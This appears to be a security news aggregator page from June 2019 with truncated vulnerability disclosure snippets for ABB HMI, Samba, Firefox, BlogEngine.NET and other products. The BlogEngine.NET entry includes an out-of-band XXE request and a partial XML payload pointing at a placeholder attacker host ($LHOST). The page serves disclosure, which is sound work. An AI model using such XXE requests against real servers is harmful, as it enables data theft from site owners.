Security News

XL-19-006 - ABB HMI Outdated Software Components

Full Disclosure - 24 June, 2019 - 02:06

Posted by xen1thLabs on Jun 24

XL-19-006 - ABB HMI Outdated Software Components
========================================================================

Identifiers
-----------
XL-19-006
ABBVU-IAMF-1902001
ABBVU-IAMF-1902010

CVSS Score
----------
7.1 (AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
xen1thLabs - Software Labs

Vulnerability summary
---------------------
ABB HMI uses outdated software components that are...

XL-19-007 - ABB IDAL FTP Server Buffer Overflow Vulnerability

Full Disclosure - 24 June, 2019 - 02:06

Posted by xen1thLabs on Jun 24

XL-19-007 - ABB IDAL FTP Server Buffer Overflow Vulnerability
========================================================================

Identifiers
-----------
XL-19-007
CVE-2019-7231
ABBVU-IAMF-1902010

CVSS Score
----------
6.5 (AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL FTP server is...

XL-19-005 - ABB HMI Absence of Signature Verification Vulnerability

Full Disclosure - 24 June, 2019 - 02:06

Posted by xen1thLabs on Jun 24

XL-19-005 - ABB HMI Absence of Signature Verification Vulnerability
========================================================================

Identifiers
-----------
XL-19-005
CVE-2019-7229
ABBVU-IAMF-1902003
ABBVU-IAMF-1902012

CVSS Score
----------
8.3 (AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
xen1thLabs - Software Labs

Vulnerability summary
---------------------
ABB HMI uses two...

XL-19-004 - ABB IDAL FTP Server Uncontrolled Format String Vulnerability

Full Disclosure - 24 June, 2019 - 02:06

Posted by xen1thLabs on Jun 24

XL-19-004 - ABB IDAL FTP Server Uncontrolled Format String Vulnerability
========================================================================

Identifiers
-----------
XL-19-004
CVE-2019-7230
ABBVU-IAMF-1902008

CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL FTP...

Re: Multiple Cross-site Scripting Vulnerabilities in Shopware 5.5.6

Full Disclosure - 24 June, 2019 - 02:04

Posted by Henri Salo on Jun 24

Please use CVE-2019-12935 for this vulnerability.

Quarking Password Manager 3.1.84 - Clickjacking Vulnerability

Full Disclosure - 24 June, 2019 - 02:04

Posted by gionreale on Jun 24

Quarking Password Manager 3.1.84 suffers from a clickjacking
vulnerability caused by allowing * within web_accessible_resources. An
attacker can take advantage of this vulnerability and cause significant
harm.

CVE-2019-12880

BlogEngine.Net XXE issues

Full Disclosure - 24 June, 2019 - 02:03

Posted by aaron bishop on Jun 24

BlogEngine.NET, versions 3.3.7 and earlier, are vulnerable to an
Out-of-band XXE attack through syndication.axd and pingback.axd.

*syndication.axd *accepts an external xml as the value for apml through a
request such as:

http://$RHOST/blog/syndication.axd?*apml=http://$LHOST/oob.xml*

*pingback.axd* will parse a POST with an XML body, such as:

<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://$LHOST/ex.dtd&quot...

Vuln: Samba CVE-2019-12436 Remote Denial of Service Vulnerability

Security Focus Vulnerabilities - 23 June, 2019 - 23:00
Samba CVE-2019-12436 Remote Denial of Service Vulnerability

Vuln: Samba CVE-2019-12435 Remote Denial of Service Vulnerability

Security Focus Vulnerabilities - 23 June, 2019 - 23:00
Samba CVE-2019-12435 Remote Denial of Service Vulnerability

PC-Doctor Toolbox before 7.3 has an Uncontrolled Search Path Element

Full Disclosure - 21 June, 2019 - 17:49

Posted by Micah Wiseley on Jun 21

Full Disclosure

I. VULNERABILITY
-------------------------
Uncontrolled search path element vulnerability in PC-Doctor Toolbox prior
to version 7.3 allows local users to gain privileges and conduct DLL
hijacking attacks via a trojan horse DLL located in an unsecured directory
which has been added to the PATH environment variable.

II. CVE REFERENCE
-------------------------
CVE-2019-12280

III. VENDOR
-------------------------
PC-Doctor, Inc....

Vuln: Microsoft Internet Explorer CVE-2019-0995 Security Bypass Vulnerability

Security Focus Vulnerabilities - 20 June, 2019 - 23:00
Microsoft Internet Explorer CVE-2019-0995 Security Bypass Vulnerability

Vuln: Cisco Prime Service Catalog CVE-2019-1875 Cross Site Scripting Vulnerability

Security Focus Vulnerabilities - 20 June, 2019 - 23:00
Cisco Prime Service Catalog CVE-2019-1875 Cross Site Scripting Vulnerability

Vuln: IBM Tririga Application Platform CVE-2018-2008 Unspecified Information Disclosure Vulnerability

Security Focus Vulnerabilities - 20 June, 2019 - 23:00
IBM Tririga Application Platform CVE-2018-2008 Unspecified Information Disclosure Vulnerability

Vuln: Mozilla Firefox and Firefox ESR CVE-2019-11708 Security Bypass Vulnerability

Security Focus Vulnerabilities - 20 June, 2019 - 23:00
Mozilla Firefox and Firefox ESR CVE-2019-11708 Security Bypass Vulnerability

Vuln: Mozilla Firefox and Firefox ESR CVE-2019-11707 Denial of Service Vulnerability

Security Focus Vulnerabilities - 20 June, 2019 - 23:00
Mozilla Firefox and Firefox ESR CVE-2019-11707 Denial of Service Vulnerability

Vuln: Pulse Connect Secure and Pulse Policy Secure Multiple Security Vulnerabilities

Security Focus Vulnerabilities - 19 June, 2019 - 23:00
Pulse Connect Secure and Pulse Policy Secure Multiple Security Vulnerabilities

Vuln: Symantec DLP CVE-2019-9701 Cross Site Scripting Vulnerability

Security Focus Vulnerabilities - 18 June, 2019 - 23:00
Symantec DLP CVE-2019-9701 Cross Site Scripting Vulnerability

[SECURITY] [DSA 4465-1] linux security update

Bug Traq - 18 June, 2019 - 12:12

Posted by Salvatore Bonaccorso on Jun 18

-------------------------------------------------------------------------
Debian Security Advisory DSA-4465-1 security () debian org
https://www.debian.org/security/ Salvatore Bonaccorso
June 17, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : linux
CVE ID : CVE-2019-3846 CVE-2019-5489...

CVE-2019-12323 / HC10 HC.Server Service 10.14 / Remote Invalid Pointer Write

Full Disclosure - 18 June, 2019 - 03:27

Posted by hyp3rlinx on Jun 18

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/HC10-HC.SERVER-10.14-REMOTE-INVALID-POINTER-WRITE.txt
[+] ISR: ApparitionSec

[Vendor]
www.hostingcontroller.com

[Product]
HC10 HC.Server Service 10.14

HC10 is a unified hosting automation control panel for web hosts and Cloud
based service providers to manage both Windows & Linux servers
simultaneously as part...

Microsoft Word (2016) / Deceptive File Reference Vuln

Full Disclosure - 18 June, 2019 - 03:27

Posted by hyp3rlinx on Jun 18

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WORD-DECEPTIVE-FILE-REFERENCE.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program

[Vendor]
www.microsoft.com

[Product]
Microsoft Word 2016

[Vulnerability Type]
Deceptive File Reference

[References]
ZDI-CAN-7949

[Security Issue]
When a MS Word ".docx" File contains a hyperlink to...
Syndicate content